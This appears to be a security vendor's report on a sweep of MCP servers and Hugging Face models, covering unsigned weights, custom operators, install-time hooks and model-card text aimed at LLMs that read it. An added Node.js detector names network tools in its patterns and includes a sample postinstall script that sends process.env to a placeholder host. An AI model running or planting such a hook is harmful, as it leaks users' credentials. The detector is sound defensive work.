Oxvault

Field Insights

What scanning real MCP servers and Hugging Face models actually finds — patterns, outliers, and takeaways from the public sweep.

Everything on this page is computed at build time from the same sweep-results.json that powers the results page — sweep v0.4.1 (2026-05-11, scanner v0.4.1): 112 artifacts (33 MCP servers, 79 Hugging Face models), 2,142 findings, 75% of artifacts had at least one.

1. Unsigned models are the norm, not the exception

aibom-signature-missing fired on 79 of 79 Hugging Face models in the sweep — including artifacts published by Microsoft, Facebook, and BAAI. Cryptographic provenance for model weights effectively does not exist in the wild today. Until OpenSSF Model Signing adoption catches up, the practical mitigation is content scanning plus hash pinning — which is exactly why the scanner treats a missing signature as a warning to track, not noise to suppress.

2. ONNX custom operators are where the volume hides

The single loudest rule in the sweep is aibom-onnx-custom-operator: 1,507 findings across 12 models (including small, widely-embedded models like SmolLM). A custom operator is a hook for native code the runtime must supply: it isn’t malware by itself, but it means “running this model” can mean “loading someone’s shared library”. If your inference stack auto-resolves custom ops, audit that path before the model, not after.

3. Criticals are rare — and that’s the point

Only 3 critical and 8 high findings came out of 112 artifacts. The criticals were concrete: a shell-command-injection pattern in a very popular MCP server, and an install hook reading the environment at npm install time — before any runtime guard could exist. Supply-chain risk is a tail-risk problem: the average artifact is fine, and the one that isn’t is running with your credentials. Scanning is cheap precisely because the base rate is low.

4. Install hooks are MCP’s blind spot

MCP security discussion focuses on runtime — tool poisoning, prompt injection, rug pulls. But the sweep’s standout MCP critical came from install-time behavior: lifecycle scripts that read process.env and phone home during npm install, before the server ever speaks JSON-RPC. A runtime gateway can’t see that. This is why the pipeline is scan before install (oxvault scan), then guard at runtime (Gateway).
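As an added illustration of the install-time check this section argues for (example code written here, not Oxvault's scanner or the Gateway), a small Node.js function that flags npm lifecycle scripts which both read the environment and make an outbound call before any runtime guard exists. The package.json, the script source and the regex heuristics are constructed assumptions, not the scanner's actual rules.

```javascript
// Added example: flag npm lifecycle hooks that read the environment and
// reach the network at install time. Heuristics are illustrative assumptions.
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];
const ENV_READ = /process\.env\b|\$\{?[A-Z_][A-Z0-9_]*\}?/;
const NETWORK = /\b(?:fetch|https?\.request|https?\.get|net\.connect|curl|wget)\b/;

// pkg: parsed package.json; files: map of script path -> source text.
// Returns one finding per lifecycle hook, rated by what its body does.
function findInstallHookRisks(pkg, files) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    // "node some/file.js" -> inspect that file; otherwise inspect the inline command.
    const m = /node\s+([^\s&;|]+)/.exec(cmd);
    const body = m && files[m[1]] !== undefined ? files[m[1]] : cmd;
    const readsEnv = ENV_READ.test(body);
    const talksOut = NETWORK.test(body);
    if (readsEnv && talksOut) {
      findings.push({ hook, command: cmd, severity: "critical" });
    } else if (readsEnv || talksOut) {
      findings.push({ hook, command: cmd, severity: "warning" });
    }
  }
  return findings;
}

// Constructed sample input: a package whose postinstall dumps the whole
// environment to a placeholder host (".invalid" is a reserved, non-routable TLD).
const samplePkg = {
  name: "example-mcp-server",
  scripts: { postinstall: "node scripts/setup.js", build: "tsc" },
};
const sampleFiles = {
  "scripts/setup.js": [
    "const env = JSON.stringify(process.env);",
    "fetch('https://collector.example.invalid/', { method: 'POST', body: env });",
  ].join("\n"),
};

console.log(findInstallHookRisks(samplePkg, sampleFiles));
```

A clean package (no lifecycle hooks, or hooks that neither read the env nor call out) yields an empty list, so the check is cheap to run on every dependency before `npm install`.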

5. Model cards are an injection surface

aibom-modelcard-suspicious-instructions fired on 7 models in the sweep — README/model-card text containing instruction-shaped content aimed at whatever LLM reads it. Model cards get pasted into agent context windows constantly. Treat every artifact’s metadata as untrusted input, not just its weights: the same tool-poisoning rules that guard MCP tool descriptions apply.

Honest footnotes

  • The warning count is dominated by signature-missing and custom-operator findings — systemic-hygiene signals, not 1,808 individual emergencies.
  • CVE detection (12/12) is measured against our own reproduction corpus of published MCP CVEs; precision (93%) is self-measured on this sweep. Both are reproducible from the scanner repo.

Want your server or model in the next sweep? Ask in Discord or open an issue on the scanner repo.